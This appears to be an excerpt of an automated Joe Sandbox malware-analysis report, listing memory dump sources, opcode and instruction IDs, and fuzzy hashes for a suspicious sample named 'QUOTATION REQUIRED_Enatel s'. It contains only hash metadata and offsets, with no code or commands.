                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bd4c41c0ccf4aa2dd815356f4d36a737fe0fc1e4c92f9a42c4c10debafd99a8e
                                                                                                                                              • Instruction ID: f65173722367864330ec63de728d4bc8be747b5af1ef8c2dbdcbf94a884ac0f0
                                                                                                                                              • Opcode Fuzzy Hash: bd4c41c0ccf4aa2dd815356f4d36a737fe0fc1e4c92f9a42c4c10debafd99a8e
                                                                                                                                              • Instruction Fuzzy Hash: 69F0AF363006414FEBA56B34961473E2B92AF85642F090054D5C2CB7E1EF24E801C756
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f9054d647979cf2815b6e27b58328354db7cb2fd3113248b24269b4661b44173
                                                                                                                                              • Instruction ID: a24206b29df23dc38e05379141b411189c1fc740c97cd5972b99589ff858163f
                                                                                                                                              • Opcode Fuzzy Hash: f9054d647979cf2815b6e27b58328354db7cb2fd3113248b24269b4661b44173
                                                                                                                                              • Instruction Fuzzy Hash: 97F06D729102098FDB50DF78C8857BC7BF0FB44301F0489BAE419D7241E678EA059B81
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 89938a56a02772fcaed30099af49cd53538067129dfd698054ffffd43b1fe1e0
                                                                                                                                              • Instruction ID: 0092b229d0bf2455195171ff3bfd24c6d28c761e03b448e6cee1d4ed52dc01a7
                                                                                                                                              • Opcode Fuzzy Hash: 89938a56a02772fcaed30099af49cd53538067129dfd698054ffffd43b1fe1e0
                                                                                                                                              • Instruction Fuzzy Hash: DDF02235A102488FCB10EF69D88088EBFB5EF8A300710016BD104A7325D630A905CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1638199905.000000000C380000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c380000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              • Instruction Fuzzy Hash: 9DE08C31A00308EFDB00EFA4F904A5CBBB9FB84310B208599D808D3309DB366F14DB96
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 986b6fd7bbaccdc49fd123008d68318d258d3cf527647f673e5d77e85fa66631
                                                                                                                                              • Instruction ID: cd7f8f7d4954b85df7f620aa443ceeb78d2e4b36446a5f45127274d5ee362a27
                                                                                                                                              • Opcode Fuzzy Hash: 986b6fd7bbaccdc49fd123008d68318d258d3cf527647f673e5d77e85fa66631
                                                                                                                                              • Instruction Fuzzy Hash: BEE0C2352141589BC3018B79F40D9A97FE8DF4A620B18819FF84483322DA70CD14C780
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3d7e8c08628c7c06461cef5dd4235b58bac7d70ffae51986c1dbe9925e16713a
                                                                                                                                              • Instruction ID: 1713a8da01d2a5a4281a50eb686d2302502faf9f6f90c6e38528a6dae85f6a04
                                                                                                                                              • Opcode Fuzzy Hash: 3d7e8c08628c7c06461cef5dd4235b58bac7d70ffae51986c1dbe9925e16713a
                                                                                                                                              • Instruction Fuzzy Hash: 3FE086368057E08FD311BF98E689AA07BA1AF02326F464097F4949B456C735E8848B69
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ca6db88ececfc31cc8c78a69bfebccc86c3310bc0af0e2dea35baa42e4a8f681
                                                                                                                                              • Instruction ID: 2143b818e6faa4d5e771c1c9bc8e86ff09b14f658bc4f8563895bc0ab7663574
                                                                                                                                              • Opcode Fuzzy Hash: ca6db88ececfc31cc8c78a69bfebccc86c3310bc0af0e2dea35baa42e4a8f681
                                                                                                                                              • Instruction Fuzzy Hash: 0BE0CD20508B48DFC702BB78E10415DFF30DF52205F4205D5D8C4A7095DF760565C362
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cf0383f57ec18694adc7e8b7d860c687924350abf10392b3de6b2263316d1f6b
                                                                                                                                              • Instruction ID: f5ba42bf31698aa84ea9165417020d6ec115d4a7e491f60919cdd987aee9f125
                                                                                                                                              • Opcode Fuzzy Hash: cf0383f57ec18694adc7e8b7d860c687924350abf10392b3de6b2263316d1f6b
                                                                                                                                              • Instruction Fuzzy Hash: 2BD0C9363101289F87049B68E508CA97BE9EF4D6613158166F909C7361CE71DC108BD4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7a4e332531f78095091d3169aaed971e50fd73a9faa9564b8d5214b03b899619
                                                                                                                                              • Instruction ID: 811dba1f006694429edcd7080c5c435e4f91b702466105d699d5558f131f097a
                                                                                                                                              • Opcode Fuzzy Hash: 7a4e332531f78095091d3169aaed971e50fd73a9faa9564b8d5214b03b899619
                                                                                                                                              • Instruction Fuzzy Hash: 72D0C961C04A0CA6DB01BBFCA54906DFF38EE81616F4106E5ECC471088EF7259B883A6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c90ff5341dfa3259e494fc3515a04a20e081076422e97bb567f3271eb6092599
                                                                                                                                              • Instruction ID: 56af1e7febad1dbbd262d0a6817ff0040caf4d5c661c66c033cd3fce0fd3cdf8
                                                                                                                                              • Opcode Fuzzy Hash: c90ff5341dfa3259e494fc3515a04a20e081076422e97bb567f3271eb6092599
                                                                                                                                              • Instruction Fuzzy Hash: 5ED0A737302144FEEB41AFE0D940F953F21AB04204F109045F6481E612C332D516DB10
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 73d29947e6a43e7385ed8af8c8a8f8e91b3ad9764e98c23f6aea1899ffc9a834
                                                                                                                                              • Instruction ID: 77fb5e321273560ba387c7b34c95522781085d93cd7f0d9a5eee5bf47e2bbb0a
                                                                                                                                              • Opcode Fuzzy Hash: 73d29947e6a43e7385ed8af8c8a8f8e91b3ad9764e98c23f6aea1899ffc9a834
                                                                                                                                              • Instruction Fuzzy Hash: F4D05E31008148ABC301CB71D449E807B64EB56210F008496E94407623C23699159740
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 54dfffe51d507c01135a302fc27dd11b0799a75cc4ddb615e0009239fe046564
                                                                                                                                              • Instruction ID: d392707dba29f19929f9a7d2ee79b33c4e7d089732fefa08ea22bfcb2ca3292a
                                                                                                                                              • Opcode Fuzzy Hash: 54dfffe51d507c01135a302fc27dd11b0799a75cc4ddb615e0009239fe046564
                                                                                                                                              • Instruction Fuzzy Hash: 5CD0A93A208244FFCB026B90CA90A5A7F22AF19309F08808AE3440D0A3C333E627E740
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1e1315897758871a468a205bf2118c00cc62058d93a0a45e5ccb2a974e2a2972
                                                                                                                                              • Instruction ID: 7b19ca618387acb72bd2699e5265f773eda85f0467757cfbdbe79e98d9f59f40
                                                                                                                                              • Opcode Fuzzy Hash: 1e1315897758871a468a205bf2118c00cc62058d93a0a45e5ccb2a974e2a2972
                                                                                                                                              • Instruction Fuzzy Hash: 19C01236300208BFEA80AA94C840E567769AB08A14F909000BA084A201C272E8629BA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 051f4dad50d965818926c479f4de2e7b12e7c971a1e86047b67a893119b13880
                                                                                                                                              • Instruction ID: aa479a2b8e5764cfe96fd5f6069cfc9bd77bd88c50068d730c1ab11f4952ebef
                                                                                                                                              • Opcode Fuzzy Hash: 051f4dad50d965818926c479f4de2e7b12e7c971a1e86047b67a893119b13880
                                                                                                                                              • Instruction Fuzzy Hash: 57C012B39285044DE240B564CC0134D7760EB75205F404125D18462104FA1092948792
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f635b49df520eddc9ab47631a8a42d2128c6193e7085329d90939bb2aa4ce790
                                                                                                                                              • Instruction ID: c2b3f8770d83cc3eb59b6d1309bed855c162a8fccc9ab82dc6e670e0a2c6ddde
                                                                                                                                              • Opcode Fuzzy Hash: f635b49df520eddc9ab47631a8a42d2128c6193e7085329d90939bb2aa4ce790
                                                                                                                                              • Instruction Fuzzy Hash: 94C08C3220010CBBCB027E80CD00E09BF2AFB04794F108004F7040D021D373E523ABD0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6e36e40828bb54151dc096c63672e5de10aa6ef5bf553f7f7b84087f8c64179d
                                                                                                                                              • Instruction ID: 57f2b9c424ced05591c7d1c4c05665703def80c980b2ab805ad222b1cfbee186
                                                                                                                                              • Opcode Fuzzy Hash: 6e36e40828bb54151dc096c63672e5de10aa6ef5bf553f7f7b84087f8c64179d
                                                                                                                                              • Instruction Fuzzy Hash: 1CC08C93D0E3C02EF30722E008126A03F205F2360CF0B50C2C6C48A1E382A42A21C3B6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8ce3380cdf97e7d4e489f796357fe9db9c22feb0a187a8b3286a302f36e05b2e
                                                                                                                                              • Instruction ID: 670bd615c417dbecf5ef85ef91d22a28502172b54135a5cf344cb2b2ae185e92
                                                                                                                                              • Opcode Fuzzy Hash: 8ce3380cdf97e7d4e489f796357fe9db9c22feb0a187a8b3286a302f36e05b2e
                                                                                                                                              • Instruction Fuzzy Hash: 50C09B372741049FD605EB90CD84D15FEA5FF95B46785DC53A28595030D731D81CFB26
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e2cf9becf1ae395904a7dd0f97555099adc312e85f722a28cf427b0e148bbec9
                                                                                                                                              • Instruction ID: 83e7f10a32a115222db063ae1e6a4f0d64ec04f75d5623670943b846a6f19a9e
                                                                                                                                              • Opcode Fuzzy Hash: e2cf9becf1ae395904a7dd0f97555099adc312e85f722a28cf427b0e148bbec9
                                                                                                                                              • Instruction Fuzzy Hash: 98C08C3711618059DB03D7F09D48A41BFF0FB29744F08C887E2C046032D630952CEB10
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                                                              • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                                                                                                              • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                                                              • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fdcac4086038425f8a5f734f3d18f0342eed85320848957f9bfb14a864d44221
                                                                                                                                              • Instruction ID: c1e04c36570879860f65dc99825a351d02a942c2918d58ddd3faeee60f2438ac
                                                                                                                                              • Opcode Fuzzy Hash: fdcac4086038425f8a5f734f3d18f0342eed85320848957f9bfb14a864d44221
                                                                                                                                              • Instruction Fuzzy Hash: 41B012B574430466F20032920C75B6B6851FBD1B0AF80DC57F2441008549E1F85467FB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4aa4e63747f8efc856918aedf2c880ee59f390d88babf39a444c449425944924
                                                                                                                                              • Instruction ID: 71e773d2817b93eb015e29a2e9e24b681d12447c1ca7db11545cc0585641009d
                                                                                                                                              • Opcode Fuzzy Hash: 4aa4e63747f8efc856918aedf2c880ee59f390d88babf39a444c449425944924
                                                                                                                                              • Instruction Fuzzy Hash: 6CB0120614A3C000FA0193F238453182D105343602F8E41C7C0440004355181008E351
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1638199905.000000000C380000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C380000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c380000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3d2f4edcb563963b67ab893a71db169491fe0e7f0651ffe2d62a7c7a604e68ce
                                                                                                                                              • Instruction ID: 0cc077eb11526c72ce4b9cd02a128ff7e0ea29344c3817c00c97428de94d1b61
                                                                                                                                              • Opcode Fuzzy Hash: 3d2f4edcb563963b67ab893a71db169491fe0e7f0651ffe2d62a7c7a604e68ce
                                                                                                                                              • Instruction Fuzzy Hash: ECC1AB317113548FEB15EB76C460BAEB6F6AF89700F24446ED54ACB290DB34E90ACF91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 405a59632052aa3705dc88e447b15f3811c2aabe7d0e9e7cdebad8996ae1a17a
                                                                                                                                              • Instruction ID: b8938f2f7017a5c0f9ff039bedcc4afbb7ac02f04533e37eef860c23080ed1d9
                                                                                                                                              • Opcode Fuzzy Hash: 405a59632052aa3705dc88e447b15f3811c2aabe7d0e9e7cdebad8996ae1a17a
                                                                                                                                              • Instruction Fuzzy Hash: 2FE13B74E102198FDB14DFA8D580AAEFBF2FF89304F248169D415AB359D730A942CFA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 981ea7e6736286e969b5b2e82c3a617df9251f5438ebaaf1f40916097a5a1bd5
                                                                                                                                              • Instruction ID: 4a5c642b641fd4ce46bea62b4deb86f806f3b7075606175d59a92ddb7ba0acc8
                                                                                                                                              • Opcode Fuzzy Hash: 981ea7e6736286e969b5b2e82c3a617df9251f5438ebaaf1f40916097a5a1bd5
                                                                                                                                              • Instruction Fuzzy Hash: C2E1FA74E002198FDB14DFA9C584AAEFBF2FF89305F248169D419A735AD731A942CF60
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ec85a68cea99adf371cdfb501a6ef2c80361a8f36babda39aac81748b26e44c6
                                                                                                                                              • Instruction ID: 6fdeab2adf2e97d407eeced7ed7454ef79fed737a25dcbaad4234bfa2b143b9e
                                                                                                                                              • Opcode Fuzzy Hash: ec85a68cea99adf371cdfb501a6ef2c80361a8f36babda39aac81748b26e44c6
                                                                                                                                              • Instruction Fuzzy Hash: 3EE11A74E002198FDB14DFA9C590AAEFBF6FF89305F248169D415AB35AD730A942CF60
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4bb9a3812fa1fa1a2dd06747118f07ee9a98c1666c0cc37bd3d79569e52aaddd
                                                                                                                                              • Instruction ID: 61d745b3562191ea5c023e43ff872297f0c9898536012421fb7562b84b0dadf3
                                                                                                                                              • Opcode Fuzzy Hash: 4bb9a3812fa1fa1a2dd06747118f07ee9a98c1666c0cc37bd3d79569e52aaddd
                                                                                                                                              • Instruction Fuzzy Hash: A9E1FA74E102198FDB14DF99C580AAEFBF2FF89305F248169D815AB356D731A942CFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0c8aaff8dffb6de07ee5228c8c60a8d78fa621018d4e2f63310bcd2f3a704093
                                                                                                                                              • Instruction ID: 05c0bce1384db07f364c577016ccd39fe72608c52da3c05c02ca9c74e497f835
                                                                                                                                              • Opcode Fuzzy Hash: 0c8aaff8dffb6de07ee5228c8c60a8d78fa621018d4e2f63310bcd2f3a704093
                                                                                                                                              • Instruction Fuzzy Hash: 63E11A74E002198FDB14DFA9C580AAEFBF2FF89305F24816AD415A7359D731A942DFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6081cd65abd80dae20cde988d6fa837d5b9b7acccdaf137f23727ac18de80a32
                                                                                                                                              • Instruction ID: 9c0f33c649d6dae5d3c99580ece69d63591d1968b728b2bef047f2b20e44f13b
                                                                                                                                              • Opcode Fuzzy Hash: 6081cd65abd80dae20cde988d6fa837d5b9b7acccdaf137f23727ac18de80a32
                                                                                                                                              • Instruction Fuzzy Hash: 2CD1E831D2075A8ADB10EF64D990A99B7B1FFD5300F20DB9AE44937224EF70AAC5CB41
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9f5576947544c185dd12ff0facdd1e77be0ee6a264d83e597227b0f455286703
                                                                                                                                              • Instruction ID: 9318b5f8940b1a813c8e235b70a8dd6e74bd7134fecb1dce66c4c9b9a2674a0a
                                                                                                                                              • Opcode Fuzzy Hash: 9f5576947544c185dd12ff0facdd1e77be0ee6a264d83e597227b0f455286703
                                                                                                                                              • Instruction Fuzzy Hash: 50D1D831D2075A8ADB10EF64D994A99B7B1FFD5300F20DB9AE44937224EF70AAD4CB41
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1631854951.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_24d0000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b0ccb4bae4864ad04bf59b0c3dba7a4abc3c07a8385172dbea2f3c079fda07ae
                                                                                                                                              • Instruction ID: 41d5336ef7cc0c3473a60a02e8766a54f2a9e70f54aeec1658d7b8880857a686
                                                                                                                                              • Opcode Fuzzy Hash: b0ccb4bae4864ad04bf59b0c3dba7a4abc3c07a8385172dbea2f3c079fda07ae
                                                                                                                                              • Instruction Fuzzy Hash: 0DA18C32F002198FCF19DFB5C85459EB7B2FF85304B25456AE806AB265DB71E946CF80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636874825.0000000007630000.00000040.00000800.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_7630000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Memory Dump Source
